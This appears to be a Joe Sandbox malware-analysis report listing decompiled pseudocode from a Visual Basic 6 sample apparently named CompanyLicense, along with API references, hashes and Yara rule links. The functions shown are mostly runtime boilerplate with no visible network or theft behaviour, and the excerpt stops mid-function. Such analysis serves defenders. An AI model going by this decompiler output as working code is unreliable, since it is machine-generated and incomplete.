                                      Download Yara Rule
                                      C-Code - Quality: 70%
                                      			E004114E0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _t36;
				signed int _t42;
				void* _t52;
				void* _t54;
				intOrPtr _t55;

				_t55 = _t54 - 0xc;
				 *[fs:0x0] = _t55;
				L004012E0();
				_v16 = _t55;
				_v12 = 0x401268;
				_v8 = 0;
				_t36 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4012e6, _t52);
				L00401412();
				_push(0x403bf0);
				L0040139A();
				if(_t36 != 1) {
					if( *0x413744 != 0) {
						_v72 = 0x413744;
					} else {
						_push(0x413744);
						_push(0x403bc8);
						L0040142A();
						_v72 = 0x413744;
					}
					_t11 =  &_v72; // 0x413744
					_v52 =  *((intOrPtr*)( *_t11));
					_t42 =  *((intOrPtr*)( *_v52 + 0x48))(_v52, 0x6f,  &_v48);
					asm("fclex");
					_v56 = _t42;
					if(_v56 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x403bb8);
						_push(_v52);
						_push(_v56);
						L0040145A();
						_v76 = _t42;
					}
					_t36 = _v48;
					_v68 = _t36;
					_v48 = _v48 & 0x00000000;
					L0040141E();
				}
				_push(0x4115d8);
				L0040140C();
				L0040143C();
				return _t36;
			}



















                                      0x004114e3
                                      0x004114f2
                                      0x004114fc
                                      0x00411504
                                      0x00411507
                                      0x0041150e
                                      0x0041151d
                                      0x00411526
                                      0x0041152b
                                      0x00411530
                                      0x00411539
                                      0x00411542
                                      0x0041155c
                                      0x00411544
                                      0x00411544
                                      0x00411549
                                      0x0041154e
                                      0x00411553
                                      0x00411553
                                      0x00411563
                                      0x00411568
                                      0x00411579
                                      0x0041157c
                                      0x0041157e
                                      0x00411585
                                      0x0041159e
                                      0x00411587
                                      0x00411587
                                      0x00411589
                                      0x0041158e
                                      0x00411591
                                      0x00411594
                                      0x00411599
                                      0x00411599
                                      0x004115a2
                                      0x004115a5
                                      0x004115a8
                                      0x004115b2
                                      0x004115b2
                                      0x004115b7
                                      0x004115ca
                                      0x004115d2
                                      0x004115d7

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 004114FC
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411526
                                      • __vbaI2Str.MSVBVM60(00403BF0,?,?,?,?,004012E6), ref: 00411530
                                      • __vbaNew2.MSVBVM60(00403BC8,00413744,00403BF0,?,?,?,?,004012E6), ref: 0041154E
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BB8,00000048), ref: 00411594
                                      • __vbaStrMove.MSVBVM60(00000000,?,00403BB8,00000048), ref: 004115B2
                                      • __vbaFreeStr.MSVBVM60(004115D8,00403BF0,?,?,?,?,004012E6), ref: 004115CA
                                      • __vbaFreeVar.MSVBVM60(004115D8,00403BF0,?,?,?,?,004012E6), ref: 004115D2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$CheckChkstkHresultMoveNew2
                                      • String ID: D7A
                                      • API String ID: 640110359-420359484
                                      • Opcode ID: 55d7dc6462d787e5266ac19bcf9c5561194426b32831ac5cf7f5bdb3f732c4f0
                                      • Instruction ID: 9d377c2ca78d9f4a9f33710062ea304e3df86685d521879dc642ea5174df40be
                                      • Opcode Fuzzy Hash: 55d7dc6462d787e5266ac19bcf9c5561194426b32831ac5cf7f5bdb3f732c4f0
                                      • Instruction Fuzzy Hash: 0C210670940208EFCB10EF95C986BDDBBB5EF44709F10802AF505B72B1D7B86A86DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E654, Relevance: 15.1, APIs: 10, Instructions: 102COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 54%
                                      			E0040E654(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _t50;
				signed int _t62;
				void* _t67;
				void* _t74;
				intOrPtr _t76;

				_t67 = __edx;
				 *[fs:0x0] = _t76;
				L004012E0();
				_v12 = _t76;
				_v8 = E00401118;
				L00401460();
				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x4012e6, __ecx, __ecx, _t74);
				asm("fclex");
				_v76 = _t50;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4038e8);
					_push(_a4);
					_push(_v76);
					L0040145A();
					_v84 = _t50;
				}
				_v32 = _v72;
				L00401460();
				L00401454();
				_v28 = E00411D89( &_v36);
				L0040144E();
				_v32 = E00411D89(_v28) + 0x2b0;
				E00411C75(_t67, _v32, _a8);
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
				asm("fclex");
				_v76 = _t62;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2b0);
					_push(0x4038e8);
					_push(_a4);
					_push(_v76);
					L0040145A();
					_v88 = _t62;
				}
				_push(0x40e797);
				L0040144E();
				return _t62;
			}






















                                      0x0040e654
                                      0x0040e665
                                      0x0040e66f
                                      0x0040e677
                                      0x0040e67a
                                      0x0040e688
                                      0x0040e699
                                      0x0040e69c
                                      0x0040e69e
                                      0x0040e6a5
                                      0x0040e6be
                                      0x0040e6a7
                                      0x0040e6a7
                                      0x0040e6a9
                                      0x0040e6ae
                                      0x0040e6b1
                                      0x0040e6b4
                                      0x0040e6b9
                                      0x0040e6b9
                                      0x0040e6c5
                                      0x0040e6cf
                                      0x0040e6d8
                                      0x0040e6e3
                                      0x0040e6e9
                                      0x0040e6fb
                                      0x0040e704
                                      0x0040e709
                                      0x0040e710
                                      0x0040e717
                                      0x0040e71e
                                      0x0040e728
                                      0x0040e732
                                      0x0040e733
                                      0x0040e734
                                      0x0040e735
                                      0x0040e739
                                      0x0040e743
                                      0x0040e744
                                      0x0040e745
                                      0x0040e746
                                      0x0040e74f
                                      0x0040e755
                                      0x0040e757
                                      0x0040e75e
                                      0x0040e77a
                                      0x0040e760
                                      0x0040e760
                                      0x0040e765
                                      0x0040e76a
                                      0x0040e76d
                                      0x0040e770
                                      0x0040e775
                                      0x0040e775
                                      0x0040e77e
                                      0x0040e791
                                      0x0040e796

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 0040E66F
                                      • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 0040E688
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038E8,00000058), ref: 0040E6B4
                                      • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0040E6CF
                                      • #644.MSVBVM60(?,?,?), ref: 0040E6D8
                                      • __vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 0040E6E9
                                      • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0040E728
                                      • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0040E739
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038E8,000002B0), ref: 0040E770
                                      • __vbaFreeObj.MSVBVM60(0040E797), ref: 0040E791
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
                                      • String ID:
                                      • API String ID: 1032928638-0
                                      • Opcode ID: e48370e53e79ca3f5e71148f94873ef4b7ebe20669c6b30a9aa24f9bf00a22a2
                                      • Instruction ID: dfde1e0ab93940fd952a4a3673299e69c3cb242bcecef37df5d19e9809c2cde3
                                      • Opcode Fuzzy Hash: e48370e53e79ca3f5e71148f94873ef4b7ebe20669c6b30a9aa24f9bf00a22a2
                                      • Instruction Fuzzy Hash: 56413871900208EFDF01EFA1C886BDEBBB5FF04348F10442AF501BB1A1D7B999868B58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411796, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 57%
                                      			E00411796(void* __ebx, void* __edi, void* __esi, void* _a36, signed int* _a52) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				short _v32;
				void* _v52;
				void* _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _t46;
				signed int _t51;
				short _t52;
				void* _t62;
				intOrPtr _t63;

				_t63 = _t62 - 0xc;
				_push(0x4012e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t63;
				_push(0x44);
				L004012E0();
				_v16 = _t63;
				_v12 = 0x401298;
				L004013EE();
				 *_a52 =  *_a52 & 0x00000000;
				if( *0x413744 != 0) {
					_v84 = 0x413744;
				} else {
					_push(0x413744);
					_push(0x403bc8);
					L0040142A();
					_v84 = 0x413744;
				}
				_t8 =  &_v84; // 0x413744
				_v60 =  *((intOrPtr*)( *_t8));
				_t46 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v52);
				asm("fclex");
				_v64 = _t46;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403bb8);
					_push(_v60);
					_push(_v64);
					L0040145A();
					_v88 = _t46;
				}
				_v68 = _v52;
				_t51 =  *((intOrPtr*)( *_v68 + 0x118))(_v68,  &_v56);
				asm("fclex");
				_v72 = _t51;
				if(_v72 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403bf4);
					_push(_v68);
					_push(_v72);
					L0040145A();
					_v92 = _t51;
				}
				_t52 = _v56;
				_v32 = _t52;
				L0040144E();
				_push(0x4118b6);
				L0040140C();
				return _t52;
			}





















                                      0x00411799
                                      0x0041179c
                                      0x004117a7
                                      0x004117a8
                                      0x004117af
                                      0x004117b2
                                      0x004117ba
                                      0x004117bd
                                      0x004117ca
                                      0x004117d2
                                      0x004117dc
                                      0x004117f6
                                      0x004117de
                                      0x004117de
                                      0x004117e3
                                      0x004117e8
                                      0x004117ed
                                      0x004117ed
                                      0x004117fd
                                      0x00411802
                                      0x00411811
                                      0x00411814
                                      0x00411816
                                      0x0041181d
                                      0x00411836
                                      0x0041181f
                                      0x0041181f
                                      0x00411821
                                      0x00411826
                                      0x00411829
                                      0x0041182c
                                      0x00411831
                                      0x00411831
                                      0x0041183d
                                      0x0041184c
                                      0x00411852
                                      0x00411854
                                      0x0041185b
                                      0x00411877
                                      0x0041185d
                                      0x0041185d
                                      0x00411862
                                      0x00411867
                                      0x0041186a
                                      0x0041186d
                                      0x00411872
                                      0x00411872
                                      0x0041187b
                                      0x0041187f
                                      0x00411886
                                      0x0041188b
                                      0x004118b0
                                      0x004118b5

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 004117B2
                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 004117CA
                                      • __vbaNew2.MSVBVM60(00403BC8,00413744,?,?,?,?,004012E6), ref: 004117E8
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BB8,00000014), ref: 0041182C
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BF4,00000118), ref: 0041186D
                                      • __vbaFreeObj.MSVBVM60 ref: 00411886
                                      • __vbaFreeStr.MSVBVM60(004118B6), ref: 004118B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$CheckFreeHresult$ChkstkCopyNew2
                                      • String ID: D7A
                                      • API String ID: 746201682-420359484
                                      • Opcode ID: 7f21c03fff2b7942bc3479a46f32500b7b470f8e9924f534b3896a954edc29ee
                                      • Instruction ID: 3da20f0e6b97daf0e09974339a0e336b86ea47bf3633eb58ce79b472e72b8b34
                                      • Opcode Fuzzy Hash: 7f21c03fff2b7942bc3479a46f32500b7b470f8e9924f534b3896a954edc29ee
                                      • Instruction Fuzzy Hash: AE31D274900208EFCB00EFD5D986BDDBBB4BF04709F20812AF111BB2A1D7786986DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00410F23, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 51%
                                      			E00410F23(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v48;
				signed int _v52;
				signed int _t21;
				char* _t24;
				intOrPtr _t34;

				_push(0x4012e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_t21 = 0x20;
				L004012E0();
				_v12 = _t34;
				_v8 = 0x401218;
				_push(0);
				_push(1);
				_push(2);
				L004013D0();
				if(_t21 != 0x102) {
					if( *0x413744 != 0) {
						_v48 = 0x413744;
					} else {
						_push(0x413744);
						_push(0x403bc8);
						L0040142A();
						_v48 = 0x413744;
					}
					_v36 =  *_v48;
					_t24 =  &_v32;
					L00401460();
					_t21 =  *((intOrPtr*)( *_v36 + 0x10))(_v36, _t24, _t24, _a4);
					asm("fclex");
					_v40 = _t21;
					if(_v40 >= 0) {
						_v52 = _v52 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x403bb8);
						_push(_v36);
						_push(_v40);
						L0040145A();
						_v52 = _t21;
					}
					L0040144E();
				}
				asm("wait");
				_push(0x410fea);
				return _t21;
			}













                                      0x00410f28
                                      0x00410f33
                                      0x00410f34
                                      0x00410f3d
                                      0x00410f3e
                                      0x00410f46
                                      0x00410f49
                                      0x00410f50
                                      0x00410f52
                                      0x00410f54
                                      0x00410f56
                                      0x00410f60
                                      0x00410f69
                                      0x00410f83
                                      0x00410f6b
                                      0x00410f6b
                                      0x00410f70
                                      0x00410f75
                                      0x00410f7a
                                      0x00410f7a
                                      0x00410f8f
                                      0x00410f95
                                      0x00410f99
                                      0x00410fa7
                                      0x00410faa
                                      0x00410fac
                                      0x00410fb3
                                      0x00410fcc
                                      0x00410fb5
                                      0x00410fb5
                                      0x00410fb7
                                      0x00410fbc
                                      0x00410fbf
                                      0x00410fc2
                                      0x00410fc7
                                      0x00410fc7
                                      0x00410fd3
                                      0x00410fd3
                                      0x00410fd8
                                      0x00410fd9
                                      0x00000000

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00410F3E
                                      • #588.MSVBVM60(00000002,00000001,00000000,?,?,?,?,004012E6), ref: 00410F56
                                      • __vbaNew2.MSVBVM60(00403BC8,00413744,00000002,00000001,00000000,?,?,?,?,004012E6), ref: 00410F75
                                      • __vbaObjSetAddref.MSVBVM60(?,?,00000002,00000001,00000000,?,?,?,?,004012E6), ref: 00410F99
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BB8,00000010,?,?,?,?,?,?,004012E6), ref: 00410FC2
                                      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004012E6), ref: 00410FD3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$#588AddrefCheckChkstkFreeHresultNew2
                                      • String ID: D7A
                                      • API String ID: 999118292-420359484
                                      • Opcode ID: 01a679c422231bad8ea73c2104b811225daee1e1c8a65197560c9b6deb36dafa
                                      • Instruction ID: 3187185d973d63851f34d3e6364edd9d147b0b1c8e573a859bc00980647bc6e6
                                      • Opcode Fuzzy Hash: 01a679c422231bad8ea73c2104b811225daee1e1c8a65197560c9b6deb36dafa
                                      • Instruction Fuzzy Hash: 6E11EDB0A50208AFDB109F95C846FDDB7B4EB08B09F10806BF411B61E1D7FD69859B2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411A18, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 65%
                                      			E00411A18(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v32;
				short _v36;
				signed int _t15;
				short _t19;
				void* _t26;
				void* _t28;
				intOrPtr _t29;

				_t29 = _t28 - 0xc;
				 *[fs:0x0] = _t29;
				L004012E0();
				_v16 = _t29;
				_v12 = 0x4012b8;
				_v8 = 0;
				_t15 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4012e6, _t26);
				_push(0x403c1c);
				L00401382();
				L0040141E();
				_push(_t15);
				_push(0x403c28);
				L004013B8();
				asm("sbb eax, eax");
				_v36 =  ~( ~( ~_t15));
				L0040140C();
				_t19 = _v36;
				if(_t19 != 0) {
					_push(L"RESYNTHESIZED");
					L0040137C();
				}
				_push(0x411aae);
				return _t19;
			}













                                      0x00411a1b
                                      0x00411a2a
                                      0x00411a34
                                      0x00411a3c
                                      0x00411a3f
                                      0x00411a46
                                      0x00411a55
                                      0x00411a58
                                      0x00411a5d
                                      0x00411a67
                                      0x00411a6c
                                      0x00411a6d
                                      0x00411a72
                                      0x00411a79
                                      0x00411a7f
                                      0x00411a86
                                      0x00411a8b
                                      0x00411a91
                                      0x00411a93
                                      0x00411a98
                                      0x00411a98
                                      0x00411a9d
                                      0x00000000

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411A34
                                      • #521.MSVBVM60(00403C1C,?,?,?,?,004012E6), ref: 00411A5D
                                      • __vbaStrMove.MSVBVM60(00403C1C,?,?,?,?,004012E6), ref: 00411A67
                                      • __vbaStrCmp.MSVBVM60(00403C28,00000000,00403C1C,?,?,?,?,004012E6), ref: 00411A72
                                      • __vbaFreeStr.MSVBVM60(00403C28,00000000,00403C1C,?,?,?,?,004012E6), ref: 00411A86
                                      • #532.MSVBVM60(RESYNTHESIZED,00403C28,00000000,00403C1C,?,?,?,?,004012E6), ref: 00411A98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$#521#532ChkstkFreeMove
                                      • String ID: RESYNTHESIZED
                                      • API String ID: 2085174944-2169086100
                                      • Opcode ID: 17e6767fb07ce83aaf1d68e157f72268f6229ea2235a02ca94614b3019aba531
                                      • Instruction ID: d5b90627d7ac837f56a4303c11ebbad2206acfc21c0c3180c02dd93269833440
                                      • Opcode Fuzzy Hash: 17e6767fb07ce83aaf1d68e157f72268f6229ea2235a02ca94614b3019aba531
                                      • Instruction Fuzzy Hash: 56018F31A40309ABDB00AFA5C842FAE7BA8AF04B44F10817BF505F71E1DA7C99408799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041115C, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E0041115C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v64;
				signed int _v68;
				char* _t36;
				signed int _t39;
				void* _t50;
				void* _t52;
				intOrPtr _t53;

				_t53 = _t52 - 0xc;
				 *[fs:0x0] = _t53;
				L004012E0();
				_v16 = _t53;
				_v12 = 0x401238;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4012e6, _t50);
				L00401412();
				if( *0x413010 != 0) {
					_v64 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v64 = 0x413010;
				}
				_t36 =  &_v44;
				L00401430();
				_v48 = _t36;
				_t39 =  *((intOrPtr*)( *_v48 + 0x1bc))(_v48, _t36,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x2fc))( *_v64));
				asm("fclex");
				_v52 = _t39;
				if(_v52 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x403ac4);
					_push(_v48);
					_push(_v52);
					L0040145A();
					_v68 = _t39;
				}
				L0040144E();
				_push(0x411247);
				L0040143C();
				return _t39;
			}

















                                      0x0041115f
                                      0x0041116e
                                      0x00411178
                                      0x00411180
                                      0x00411183
                                      0x0041118a
                                      0x00411199
                                      0x004111a2
                                      0x004111ae
                                      0x004111c8
                                      0x004111b0
                                      0x004111b0
                                      0x004111b5
                                      0x004111ba
                                      0x004111bf
                                      0x004111bf
                                      0x004111e3
                                      0x004111e7
                                      0x004111ec
                                      0x004111f7
                                      0x004111fd
                                      0x004111ff
                                      0x00411206
                                      0x00411222
                                      0x00411208
                                      0x00411208
                                      0x0041120d
                                      0x00411212
                                      0x00411215
                                      0x00411218
                                      0x0041121d
                                      0x0041121d
                                      0x00411229
                                      0x0041122e
                                      0x00411241
                                      0x00411246

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411178
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 004111A2
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,?,?,?,?,004012E6), ref: 004111BA
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004111E7
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000001BC), ref: 00411218
                                      • __vbaFreeObj.MSVBVM60 ref: 00411229
                                      • __vbaFreeVar.MSVBVM60(00411247), ref: 00411241
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$CheckChkstkHresultNew2
                                      • String ID:
                                      • API String ID: 1725699769-0
                                      • Opcode ID: 35640f0ab917591a226f63932e4bb344571b0fc7e0d88eee38d0c25644cba070
                                      • Instruction ID: b7572510e73ec9a1a96d7c45c6eec1d40246c35e3abe97173b01bd1eb91a77cf
                                      • Opcode Fuzzy Hash: 35640f0ab917591a226f63932e4bb344571b0fc7e0d88eee38d0c25644cba070
                                      • Instruction Fuzzy Hash: E821F571A00208AFCB00EFA5D889BDDBBB4BB08708F10846AF501BB2B1C7795945DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004115F7, Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E004115F7(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4, void* _a12, void* _a32, signed int* _a60) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v28;
				char _v44;
				signed int* _t19;
				char* _t22;
				void* _t29;
				void* _t31;
				long long* _t32;

				_t32 = _t31 - 0xc;
				 *[fs:0x0] = _t32;
				L004012E0();
				_v16 = _t32;
				_v12 = 0x401278;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4012e6, _t29);
				L004013EE();
				_t22 =  &_v44;
				L00401412();
				_t19 = _a60;
				 *_t19 =  *_t19 & 0x00000000;
				asm("fldz");
				_push(_t22);
				_push(_t22);
				 *_t32 = __fp0;
				L004013D6();
				L004013DC();
				asm("fcomp qword [0x401200]");
				asm("wait");
				_push(0x41168c);
				L0040140C();
				L0040143C();
				return _t19;
			}













                                      0x004115fa
                                      0x00411609
                                      0x00411613
                                      0x0041161b
                                      0x0041161e
                                      0x00411625
                                      0x00411634
                                      0x0041163d
                                      0x00411645
                                      0x00411648
                                      0x0041164d
                                      0x00411650
                                      0x00411653
                                      0x00411655
                                      0x00411656
                                      0x00411657
                                      0x0041165a
                                      0x0041165f
                                      0x00411664
                                      0x0041166a
                                      0x0041166b
                                      0x0041167e
                                      0x00411686
                                      0x0041168b

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411613
                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 0041163D
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411648
                                      • #586.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 0041165A
                                      • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 0041165F
                                      • __vbaFreeStr.MSVBVM60(0041168C,?,?,?,?,?,?,004012E6), ref: 0041167E
                                      • __vbaFreeVar.MSVBVM60(0041168C,?,?,?,?,?,?,004012E6), ref: 00411686
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$#586ChkstkCopy
                                      • String ID:
                                      • API String ID: 2927221586-0
                                      • Opcode ID: 20662ab008779d6191b56aa9a7b622cd748215930fc66dcd3071416e6bad104e
                                      • Instruction ID: 09e4618c762cea16ed281a7b82bc8b24669cca391fbda1be14325449a5432391
                                      • Opcode Fuzzy Hash: 20662ab008779d6191b56aa9a7b622cd748215930fc66dcd3071416e6bad104e
                                      • Instruction Fuzzy Hash: 67012970500209EBDB00EF91C986B9E7BB4FF04748F40816AF401B71F1DBB89945CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411AD7, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E00411AD7(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v32;
				short _v36;
				signed int _t16;
				short _t20;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t30 = _t29 - 0xc;
				 *[fs:0x0] = _t30;
				L004012E0();
				_v16 = _t30;
				_v12 = 0x4012c8;
				_v8 = 0;
